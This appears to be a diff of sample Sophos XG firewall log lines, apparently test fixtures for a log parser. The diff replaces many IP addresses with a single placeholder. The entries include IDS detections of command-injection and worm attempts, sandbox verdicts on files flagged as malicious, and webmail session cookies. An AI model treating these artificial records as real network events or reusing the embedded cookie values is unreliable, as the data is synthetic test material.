appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=175.16.199.1 src_country_code="" dst_ip=10.84.234.14 dst_country_code="" protocol="UDP" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:44 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=012802605201 log_type="Firewall" log_component="SSL VPN" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="tun0" out_interface="" src_mac="" src_ip=10.82.234.9 src_country_code="" dst_ip=10.82.234.11 dst_country_code="" protocol="TCP" src_port=58331 dst_port=56267 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name="elastic@user.local" user_gp="elastic.group.local" iap=0 ips_policy_id=11 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=172.16.34.50 dst_country_code=R1 protocol="TCP" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="VPN" srczone="VPN" dstzonetype="VPN" dstzone="VPN" dir_disp="" connevent="Start" connid="1615935064" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=018201500005 log_type="Firewall" log_component="ICMP ERROR MESSAGE" log_subtype="Allowed" status="Allow" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code="" dst_ip=172.17.32.19 dst_country_code="" protocol="ICMP" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connevent="Interim" connid="2685668438" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-06-05 time=12:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port1" src_mac=00:00:00:00:00:00 src_ip=172.17.35.119 src_country_code=R1 dst_ip=172.16.34.10 dst_country_code=R1 protocol="TCP" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype="VPN" srczone="VPN" dstzonetype="LAN" dstzone="LAN" dir_disp="" connevent="Stop" connid="1617126256" vconnid="" hb_health="NoHeartbeat" message="" appresolvedby="Signature" app_is_cloud=0" -<30>device="SFW" date=2018-05-30 time=13:26:37 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010202601001 log_type="Firewall" log_component="Invalid Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol="UDP" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="Invalid UDP destination." appresolvedby=" Signature" +<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name="elastic@user.local" user_gp="elastic.group.local" iap=0 ips_policy_id=11 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="VPN" srczone="VPN" dstzonetype="VPN" dstzone="VPN" dir_disp="" connevent="Start" connid="1615935064" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=018201500005 log_type="Firewall" log_component="ICMP ERROR MESSAGE" log_subtype="Allowed" status="Allow" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code="" dst_ip=175.16.199.1 dst_country_code="" protocol="ICMP" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connevent="Interim" connid="2685668438" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-06-05 time=12:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port1" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype="VPN" srczone="VPN" dstzonetype="LAN" dstzone="LAN" dir_disp="" connevent="Stop" connid="1617126256" vconnid="" hb_health="NoHeartbeat" message="" appresolvedby="Signature" app_is_cloud=0" +<30>device="SFW" date=2018-05-30 time=13:26:37 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010202601001 log_type="Firewall" log_component="Invalid Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="UDP" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="Invalid UDP destination." appresolvedby=" Signature" <30>device="SFW" date=2018-06-04 time=17:20:24 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=011402601301 log_type="Firewall" log_component="Fragmented Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=0.0.0.0 src_country_code= dst_ip=0.0.0.0 dst_country_code= protocol="0" src_port=0 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=14:01:32 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=2 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2.611" out_interface="" src_mac=c8:5b:76:ab:72:d3 src_ip=10.198.38.184 src_country_code= dst_ip=10.198.39.255 dst_country_code= protocol="UDP" src_port=137 dst_port=137 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=14:17:17 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=b8:97:5a:5b:0f:fd src_ip=10.198.32.19 src_country_code= dst_ip=10.198.32.48 dst_country_code= protocol="TCP" src_port=41960 dst_port=22 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby=" Signature" <30>device="SFW" date=2018-06-05 time=14:30:31 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010502604001 log_type="Firewall" log_component="ICMP Redirection" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.37.23 src_country_code= dst_ip=10.198.36.48 dst_country_code= protocol="ICMP" icmp_type=5 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby=" Signature" -<30>device="SFW" date=2018-05-31 time=17:05:14 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010602605001 log_type="Firewall" log_component="Source Routed" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol="TCP" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" +<30>device="SFW" date=2018-05-31 time=17:05:14 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010602605001 log_type="Firewall" log_component="Source Routed" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="TCP" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=15:09:51 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=011702605051 log_type="Firewall" log_component="MAC Filter" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2.531" out_interface="" src_mac=1e:3a:5a:5b:23:ab src_ip=fe80::59f5:3ce8:c98e:5062 src_country_code= dst_ip=ff02::1:2 dst_country_code= protocol="UDP" src_port=546 dst_port=547 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-06-01 time=10:57:55 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600006 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=10.198.32.19 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2018-06-01 time=10:55:41 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600003 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=72.163.4.185 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:54 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=1881 signature_msg="SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack" classification="access to a potentially vulnerable web application" rule_priority=2 src_ip=89.40.182.58 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=41528 dst_port=80 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="server-webapp" target="Server" -<30>device="SFW" date=2020-05-18 time=14:38:55 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name="" signature_id=1616 signature_msg="PROTOCOL-DNS named version attempt" classification="Attempted Information Leak" rule_priority=1 src_ip=117.50.11.192 src_country_code=CHN dst_ip=172.16.66.155 dst_country_code=R1 protocol="UDP" src_port=58914 dst_port=53 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="protocol-dns" target="Server" -<30>device="SFW" date=2020-05-18 time=14:38:56 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=53589 signature_msg="SERVER-WEBAPP DrayTek multiple products command injection attempt" classification="Web Application Attack" rule_priority=2 src_ip=77.61.185.101 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=59476 dst_port=80 platform="Linux,Mac,Other,Unix,Windows" category="server-webapp" target="Server" +<30>device="SFW" date=2018-06-01 time=10:55:41 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600003 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:54 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=1881 signature_msg="SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack" classification="access to a potentially vulnerable web application" rule_priority=2 src_ip=175.16.199.1 src_country_code=ROU dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=41528 dst_port=80 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="server-webapp" target="Server" +<30>device="SFW" date=2020-05-18 time=14:38:55 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name="" signature_id=1616 signature_msg="PROTOCOL-DNS named version attempt" classification="Attempted Information Leak" rule_priority=1 src_ip=175.16.199.1 src_country_code=CHN dst_ip=175.16.199.1 dst_country_code=R1 protocol="UDP" src_port=58914 dst_port=53 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="protocol-dns" target="Server" +<30>device="SFW" date=2020-05-18 time=14:38:56 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=53589 signature_msg="SERVER-WEBAPP DrayTek multiple products command injection attempt" classification="Web Application Attack" rule_priority=2 src_ip=175.16.199.1 src_country_code=NLD dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=59476 dst_port=80 platform="Linux,Mac,Other,Unix,Windows" category="server-webapp" target="Server" <30>device="SFW" date=2018-05-23 time=16:20:34 timezone="BST" device_name="XG750" device_id=SFDemo-f64dd6be log_id=020703406001 log_type="IDP" log_component="Anomaly" log_subtype="Detect" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name="" signature_id=26022 signature_msg="FILE-PDF EmbeddedFile contained within a PDF" classification="A Network Trojan was detected" rule_priority=1 src_ip=10.0.0.168 src_country_code=R1 dst_ip=10.1.1.234 dst_country_code=R1 protocol="TCP" src_port=28938 dst_port=25 platform="Windows" category="Malware Communication" target="Server" <30>device="SFW" date=2018-05-23 time=16:16:43 timezone="BST" device_name="XG750" device_id=SFDemo-f64dd6be log_id=020704406002 log_type="IDP" log_component="Anomaly" log_subtype="Drop" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name="" signature_id=26022 signature_msg="FILE-PDF EmbeddedFile contained within a PDF" classification="A Network Trojan was detected" rule_priority=1 src_ip=10.0.1.31 src_country_code=R1 dst_ip=10.1.0.115 dst_country_code=R1 protocol="TCP" src_port=40140 dst_port=25 platform="Windows" category="Malware Communication" target="Server" <30>device="SFW" date=2017-01-31 time=14:52:11 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=138301618041 log_type="Sandbox" log_component="Mail" log_subtype="Allowed" priority=Information user_name="" src_ip= filename="" filetype="" filesize=0 sha1sum="" source="" reason="eligible" destination="" subject="" @@ -79,11 +79,11 @@ <30>device="SFW" date=2017-01-31 time=15:28:25 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=136501618041 log_type="Sandbox" log_component="Web" log_subtype="Allowed" priority=Information user_name="" src_ip= filename="" filetype="" filesize=0 sha1sum="" source="" reason="eligible" destination="" subject="" <30>device="SFW" date=2017-01-31 time=15:28:25 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136528618043 log_type="Sandbox" log_component="Web" log_subtype="Pending" priority=Information user_name="jsmith" src_ip=10.198.47.112 filename="19.exe" filetype="application/octet-stream" filesize=153010 sha1sum="3ce799580908df9ca0dc649aa8c2d06ab267e8c8" source="10.198.241.50" reason="pending" destination="" subject="" <30>device="SFW" date=2017-01-31 time=15:28:25 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136502218042 log_type="Sandbox" log_component="Web" log_subtype="Denied" priority=Critical user_name="jsmith" src_ip=10.198.47.112 filename="19.exe" filetype="application/octet-stream" filesize=153010 sha1sum="3ce799580908df9ca0dc649aa8c2d06ab267e8c8" source="10.198.241.50" reason="cloud malicious" destination="" subject=" -<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136502218042 log_type="Sandbox" log_component="Web" log_subtype="Denied" priority=Critical user_name="" src_ip=172.16.34.24 filename="SBTestFile1.pdf" filetype="application/pdf" filesize=1124 sha1sum="d910c4a81122c360fe57f67a04999425a65249db" source="sophostest.com" reason="cached malicious" destination="" subject="" -<30>device="SFW" date=2020-05-18 time=14:38:46 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL" referer=- method=POST httpstatus=401 reason="-" extra="-" contenttype="-" useragent="Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)" host=89.68.140.204 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79 -<30>device="SFW" date=2020-05-18 time=14:38:47 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M" referer=- method=POST httpstatus=200 reason="-" extra="-" contenttype="application/mapi-http" useragent="Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)" host=89.68.140.204 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79 +<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136502218042 log_type="Sandbox" log_component="Web" log_subtype="Denied" priority=Critical user_name="" src_ip=175.16.199.1 filename="SBTestFile1.pdf" filetype="application/pdf" filesize=1124 sha1sum="d910c4a81122c360fe57f67a04999425a65249db" source="sophostest.com" reason="cached malicious" destination="" subject="" +<30>device="SFW" date=2020-05-18 time=14:38:46 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL" referer=- method=POST httpstatus=401 reason="-" extra="-" contenttype="-" useragent="Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)" host=175.16.199.1 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79 +<30>device="SFW" date=2020-05-18 time=14:38:47 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M" referer=- method=POST httpstatus=200 reason="-" extra="-" contenttype="application/mapi-http" useragent="Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)" host=175.16.199.1 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79 <30>device="SFW" date=2020-05-19 time=17:20:29 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="jsmith" server=www.iviewtest.com:8989 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol="HTTP/1.1" url=/ querystring= cookie="-" referer=- method=GET httpstatus=403 reason="Static URL Hardening" extra="No signature found" contenttype="text/html" useragent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" host=10.198.235.254 responsetime=19310 bytessent=726 bytesrcv=510 fw_rule_id=3 <30>device="SFW" date=2020-05-19 time=18:03:30 timezone="IST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information 